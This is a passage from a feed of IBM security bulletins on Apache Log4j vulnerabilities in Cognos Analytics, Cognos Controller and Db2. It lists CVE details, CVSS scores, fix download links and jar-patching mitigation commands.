(Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-44228 has been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"<log4jSafeAgent2021 Bundled>\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538720> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities \$CVE-2021-45105, CVE-2021-44832\$\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n20 April 2022 Updated Fix Version links for CA 11.x Bundle Customers to point to latest Interim Fix that address Apache log4j vulnerabilities \n13 Jan 2022 Updated Fix Version links for Bundle Customers to point to latest Interim Fixes that address Apache log4j vulnerabilities \n10 Jan 2022: Updated Fix Version titles to reflect updated latest IF version available. Updated the reference to the latest Security Bulletin that supersedes this one. Added more technical context to the Workarounds / Mitigations section and clarifed the different links available in the Remediation / Fixes section. \n30 Dec 2021: Fixed link to Security Bulletin link in References section \n30 Dec 2021: Updated Fix Version titles to reflect updated IF version \n21 Dec 2021: Updated Summary and Reference sections re: CVE-2021-45046 \n21 Dec 2021: Modified Mitigation instructions to point to .jar and .pdf \n21 Dec 2021: Added Bundled Customer links to Remediation/Fixes section . \n20 Dec 2021: Added direct link to mitigation instructions to Workarounds / Mitigations section \n16 Dec 2021: Added no-upgrade option to Workarounds / Mitigations section \n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTSF6\",\"label\":\"Cognos Analytics\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.2, 11.1, 11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:30:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:30:06", "id": "40793F706E8E7D40E73D53F66523BA8AE8718C40C00FCEF117CE8DEAC4566FD6", "href": "https://www.ibm.com/support/pages/node/6526474", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:42", "description": "## Summary\n\nIBM Cognos Controller is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Controller has upgraded Apache Log4j to v2.17.1. Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.4.2\n\n## Remediation/Fixes\n\nIf you have the listed affected version, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Cognos Controller 10.4.2 IF17 from Fix Central](<https://www.ibm.com/support/pages/node/6540652> \"Download IBM Cognos Controller 10.4.2 IF17 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\nRemediation for IBM Cognos Controller on Cloud has completed.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Controller team developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers. \n\nTo get the patch and detailed instructions, click this link: [IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around](<https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-LOG4J-WORK-AROUND:0&includeSupersedes=0&source=fc&login=true> \"IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around\" )\n\nThe patch is applicable to IBM Cognos Controller version 10.4.2. \n\nThe instructions will guide you to replace the log4j vulnerable files manually without impacting your current product version. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Jan 2022: IBM Cognos Controller on Cloud remediation completion in Remediation/Fixes \n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9S6B\",\"label\":\"Cognos Controller\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"10.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T20:04:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller 10.4.2 IF17: Apache Log4j vulnerability (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-15T20:04:06", "id": "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "href": "https://www.ibm.com/support/pages/node/6540664", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:37:25", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This bulletin covers the vulnerability caused when using versions of log4j earlier than 2.0. This version of the library is used by the ECM (Text Search) feature . CVE-2021-44228 is addressing a critical vulnerability in 2.0 <= log4j <= 2.15.0 covered in a separate security bulletin. Please see CVE-2021-44832, CVE-2021-45046, and CVE-2021-45105 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe ECM (Text Search Server) feature in all fix pack levels of IBM Db2 V10.5, V11.1, and V11.5 for all server editions on all platforms are affected. \n\nIBM Db2 V10.1 and V9.7 are not affected.\n\nIn the V11.1 release, the Hadoop federation wrapper is also impacted.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP6, V11.5.6, and V11.5.7. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nFor ECM (Text Search Server)\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV10.5| TBD| [IT39390](<https://www.ibm.com/support/pages/apar/IT39390> \"IT39390\" )| Special Build for V10.5 FP11: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-aix64-universal_fixpack-10.5.0.11-FP011%3A316242174097101888&includeSupersedes=0> \"AIX 64-bit\" ) \n[HP-UX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-hpipf64-universal_fixpack-10.5.0.11-FP011%3A242482463941196672&includeSupersedes=0> \"HP-UX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-linuxia32-client-10.5.0.11-FP011%3A438028792052427520&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxx64-universal_fixpack-10.5.0.11-FP011%3A577009839975281408&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 big endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64-universal_fixpack-10.5.0.11-FP011%3A471210663573115712&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 big endian\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64le-universal_fixpack-10.5.0.11-FP011%3A775057095159355904&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linux390x64-universal_fixpack-10.5.0.11-FP011%3A600976767882452608&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sun64-universal_fixpack-10.5.0.11-FP011%3A994737637526172160&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Solaris 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sunamd64-universal_fixpack-10.5.0.11-FP011%3A161651527260272768&includeSupersedes=0> \"Solaris 64-bit, x86-64\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-nt32-client-10.5.1100.2866-FP011%3A170657316208346784&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-ntx64-universal_fixpack-10.5.1100.2866-FP011%3A230362976060813344&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n[Inspur](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-inspurkux64-universal_fixpack-10.5.0.11-FP011%3A512422001972300608&includeSupersedes=0> \"Inspur\" ) \n \nV11.1| TBD| [IT39387](<https://www.ibm.com/support/pages/apar/IT39387> \"IT39387\" )| Special Build for V11.1.4 FP6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-aix64-universal_fixpack-11.1.4.6-FP006%3A259848826141273472&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-linuxia32-client-11.1.4.6-FP006%3A800049365576409728&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxx64-universal_fixpack-11.1.4.6-FP006%3A973220600195816448&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxppc64le-universal_fixpack-11.1.4.6-FP006%3A840967649574282368&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linux390x64-universal_fixpack-11.1.4.6-FP006%3A914289956995017856&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-sun64-universal_fixpack-11.1.4.6-FP006%3A248714336279646784&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-nt32-client-11.1.4060.1324-FP006%3A435396118409714368&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-ntx64-universal_fixpack-11.1.4060.1324-FP006%3A887641715424039424&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A830387863039344000&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.6 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.7: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134833_DB2-aix64-universal_fixpack-11.5.7.0-FP000%3A479485515202753152&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134832_DSClients-linuxia32-client-11.5.7.0-FP000%3A596706133826041984&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134831_DB2-linuxx64-universal_fixpack-11.5.7.0-FP000%3A137760201590747536&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134835_DB2-linuxppc64le-universal_fixpack-11.5.7.0-FP000%3A909787610102068096&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134834_DB2-linux390x64-universal_fixpack-11.5.7.0-FP000%3A651865390747364992&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134829_DSClients-nt32-client-11.5.7000.1973-FP000%3A855115844514252672&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134830_DB2-ntx64-universal_fixpack-11.5.7000.1973-FP000%3A352392631134626240&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.7 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nIf you are using Db2 Text Search with rich text filters, after these special builds are applied, you will be required to upgrade your version of rich text filters in addition to Db2 Text search. Appropriate rich text filters (in this case version 8.5.5) for each Db2 release can be downloaded from the Db2 accessories suite page.\n\nFor details, see [here](<https://www.ibm.com/support/pages/node/6527760> \"here\" ).\n\nFor Install (Installation Manager)\n\nWe recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nIt was determined through further investigation that while Installation Manager was found to not be impacted by CVE-2021-4104, as the Installation Manager does not use log4j in a manner that exposes the vulnerability, it does include the older version of the library. \n\nFor v11.1.x, install the Db2 fix listed in the table above for Linux 32-bit, Linux 63-bit, Windows 32-bit and/or Windows 64-bit. This fix replaces the existing log4j jar file with an empty jar file. While the vulnerability is mitigated with this fix, a scan will still show the existence of the jar file. Alternatively you may download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nFor earlier versions, we recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\n## Workarounds and Mitigations\n\nFor ECM (Text Search): \n\n\nThe vulnerable jar can be patched to mitigate the vulnerability. \nNote: Do not issue START/STOP Db2 text search server if Db2 text search is not configured.\n\nOn Linux and Unix:\n\nStop the TextSearch server: \"db2ts stop for text\".\n\nRemove the JMSAppender.class file via two options: \nHere is the command:\n \n \n zip -d log4j-1.2.17.jar org/apache/log4j/net/JMSAppender.class\n \n\nIf you do not have access to 'zip', you can also use the 'jar' command.\n \n \n #assume log4j-1.2.17.jar exists in current directory\n mkdir tmp\n cd tmp\n jar xvf ../log4j-1.2.17.jar\n rm org/apache/log4j/net/JMSAppender.class\n jar cvf ../log4j-1.2.17-patched.jar .\n cd .. \n rm log4j-1.2.17.jar \n ln -s log4j-1.2.17-patched.jar log4j-1.2.17.jar\n rm -rf tmp \n \n\nStart the TextSearch server: \"db2ts start for text\".\n\nOn Windows the Java jar tool with CMD can be used to follow the similar Unix instructions when using jar.\n \n \n Stop the TextSearch server: \"db2ts stop for text\" in the Db2 command line.\n Start the Windows CMD program and go to the SQLLIB\\db2tss\\lib directory which is found in the installation path e.g. \"cd C:\\ProgramFiles\\IBM\\SQLLIB\\db2tss\\lib\"\n Make a copy of the log4j-1.2.17.jar file e.g. \"cp log4j-1.2.17.jar log4j-1.2.17.jar.bak\"\n Make a new directory e.g. \"mkdir tmp\"\n Change to the new directory e.g. \"cd tmp\"\n Extract the jar file using the jar program found in the JDK that is in the SQLLIB\\java path e.g. \"..\\..\\..\\java\\jdk\\bin\\jar xvf ..\\log4j-1.2.17.jar\"\n Delete the JMSAppender.class file 